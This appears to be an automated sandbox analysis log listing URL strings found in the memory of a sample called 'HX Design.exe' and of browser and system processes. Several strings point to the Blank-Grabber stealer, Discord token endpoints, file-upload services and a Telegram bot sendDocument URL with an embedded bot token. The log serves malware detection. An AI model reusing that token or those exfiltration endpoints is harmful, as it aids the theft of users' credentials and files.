Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7319
Source: msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7319v
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369e
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899t
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/upload
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServer
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: HX Design.exe, 00000001.00000002.2103504052.00000294B5CBC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7941165298:AAE-cxddvAA5WE9BKSZYSVJTX3zwZRZqwIw/sendDocument
Source: chrome.exe, 0000003A.00000003.1865540039.00000BFC002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000003.1865599305.00000BFC002E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: powershell.exe, 00000028.00000002.1935866924.000001D192516000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000028.00000002.1935866924.000001D192516000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000028.00000002.1935866924.000001D192516000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0.
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v9/users/
Source: HX Design.exe, 00000001.00000002.2098822310.00000294B4410000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: HX Design.exe, 00000001.00000003.1690192379.00000294B44C2000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1692808948.00000294B44CD000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2099793800.00000294B4850000.00000004.00001000.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1693270635.00000294B44CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/howto/mro.html.
Source: HX Design.exe, 00000001.00000002.2098346887.00000294B4210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
Source: HX Design.exe, 00000001.00000002.2098346887.00000294B4210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
Source: HX Design.exe, 00000001.00000002.2098346887.00000294B4294000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
Source: HX Design.exe, 00000001.00000002.2098346887.00000294B4210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
Source: HX Design.exe, 00000001.00000002.2098346887.00000294B4294000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
Source: HX Design.exe, 00000001.00000002.2098346887.00000294B4210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
Source: HX Design.exe, 00000001.00000002.2098346887.00000294B4210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
Source: HX Design.exe, 00000001.00000002.2098346887.00000294B4210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
Source: HX Design.exe, 00000001.00000002.2098077553.00000294B298A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
Source: HX Design.exe, 00000001.00000002.2101137771.00000294B4E50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7AC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7AFF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000003C.00000003.1871820820.00000298F7A0E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7AC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7AA3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000003C.00000003.1871820820.00000298F7AF4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000003C.00000003.1871820820.00000298F7AC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7AC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/Blank-Grabber
Source: HX Design.exe, 00000001.00000003.1698834268.00000294B4E5A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1699569937.00000294B4730000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/BlankOBF
Source: HX Design.exe, 00000001.00000003.2096001614.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1706357551.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1706973666.00000294B4D31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Ousret/charset_normalizer
Source: powershell.exe, 00000028.00000002.1879970672.000001D1826D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: HX Design.exe, 00000001.00000002.2098077553.00000294B298A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2098822310.00000294B4410000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: HX Design.exe, 00000001.00000002.2102914247.00000294B5BA4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/psf/requests/pull/6710
Source: HX Design.exe, 00000001.00000002.2098346887.00000294B4294000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: HX Design.exe, 00000001.00000002.2098822310.00000294B4410000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: HX Design.exe, 00000001.00000002.2098077553.00000294B298A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2098822310.00000294B4410000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: HX Design.exe, 00000001.00000003.1702384127.00000294B4AB2000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1702130112.00000294B4695000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100033257.00000294B4A50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: HX Design.exe, 00000001.00000002.2101500679.00000294B5160000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
Source: HX Design.exe, 00000001.00000002.2098077553.00000294B298A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2098822310.00000294B4410000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: HX Design.exe, 00000001.00000002.2101137771.00000294B4E50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: HX Design.exe, 00000001.00000002.2099002748.00000294B4694000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1706757467.00000294B4694000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: HX Design.exe, 00000001.00000002.2101500679.00000294B5160000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: HX Design.exe, 00000001.00000002.2101500679.00000294B5160000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920pk/
Source: HX Design.exe, 00000001.00000002.2101500679.00000294B5160000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
Source: powershell.exe, 00000028.00000002.1879970672.000001D1830D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: msedge.exe, 0000003B.00000002.1928179785.000076D8001C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928116444.000076D8001BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: msedge.exe, 0000003B.00000002.1928179785.000076D8001C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928116444.000076D8001BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/#
Source: HX Design.exe, 00000001.00000003.2096001614.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1706357551.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100033257.00000294B4ADC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail
Source: HX Design.exe, 00000001.00000003.1706757467.00000294B4694000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail/
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gstatic.com/generate_204
Source: HX Design.exe, 00000001.00000002.2100033257.00000294B4B1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: HX Design.exe, 00000001.00000003.1706973666.00000294B4D31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/
Source: HX Design.exe, 00000001.00000002.2101621757.00000294B52BC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/get
Source: HX Design.exe, 00000001.00000002.2100033257.00000294B4A50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/post
Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/229267970
Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693
Source: msedge.exe, 0000003B.00000002.1932291296.000076D800530000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693preferSubmitOnAnySamplesPassedQueryEnd
Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/253522366
Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/255411748
Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/258207403
Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/274859104
Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/284462263
Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: HX Design.exe, 00000001.00000003.1701740081.00000294B46F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.org
Source: HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mahler:8092/site-updates.py
Source: powershell.exe, 00000008.00000002.1815598451.00000197A9B26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1879970672.000001D183E0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1935866924.000001D192658000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1935866924.000001D192516000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7AC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7A56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: powershell.exe, 00000028.00000002.1879970672.000001D183C0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000028.00000002.1879970672.000001D183C0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: HX Design.exe, 00000001.00000003.1706871511.00000294B4DB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packaging.py
Source: HX Design.exe, 00000001.00000002.2101379289.00000294B5050000.00000004.00001000.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1706871511.00000294B4DB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata
Source: HX Design.exe, 00000001.00000003.2097242552.00000294B482C000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1705144550.00000294B482E000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088968659.00000294B482C000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2099503241.00000294B482C000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1706871511.00000294B4DB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/#file-format
Source: HX Design.exe, 00000001.00000003.2097242552.00000294B482C000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1705144550.00000294B482E000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088968659.00000294B482C000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2099503241.00000294B482C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file
Source: HX Design.exe, 00000001.00000002.2100464730.00000294B4DB4000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096001614.00000294B4DB4000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1706871511.00000294B4DB4000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101500679.00000294B5160000.00000004.00001000.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101258712.00000294B4F50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: HX Design.exe, 00000001.00000003.1684305710.00000294B4411000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://peps.python.org/pep-0205/
Source: HX Design.exe, 00000001.00000002.2106827061.00007FFDFB868000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://peps.python.org/pep-0263/
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
Source: HX Design.exe, 00000001.00000002.2102914247.00000294B5BA4000.00000004.00001000.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100033257.00000294B4A50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://requests.readthedocs.io
Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: HX Design.exe, 00000001.00000003.2094717428.00000294B558B000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2102804197.00000294B558B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.micros
Source: HX Design.exe, 00000001.00000003.2094717428.00000294B555D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: HX Design.exe, 00000001.00000003.2087756770.00000294B46D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: HX Design.exe, 00000001.00000003.2094717428.00000294B555D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: HX Design.exe, 00000001.00000003.2087756770.00000294B46D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: HX Design.exe, 00000001.00000003.2094717428.00000294B558B000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2102804197.00000294B558B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/9Z
Source: HX Design.exe, 00000001.00000003.1706357551.00000294B4C69000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2095458820.00000294B4C80000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4C80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: HX Design.exe, 00000001.00000002.2100033257.00000294B4A50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
Source: HX Design.exe, 00000001.00000003.2096001614.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1706357551.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1706973666.00000294B4D31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: HX Design.exe, 00000001.00000002.2101500679.00000294B5160000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: HX Design.exe, 00000001.00000002.2101379289.00000294B5050000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: msedge.exe, 0000003B.00000002.1926276672.000076D80010C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.catcert.net/verarrel
Source: msedge.exe, 0000003B.00000002.1918020768.00000143C5253000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1922760147.00006FA40024C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1933510303.000078BC00220000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
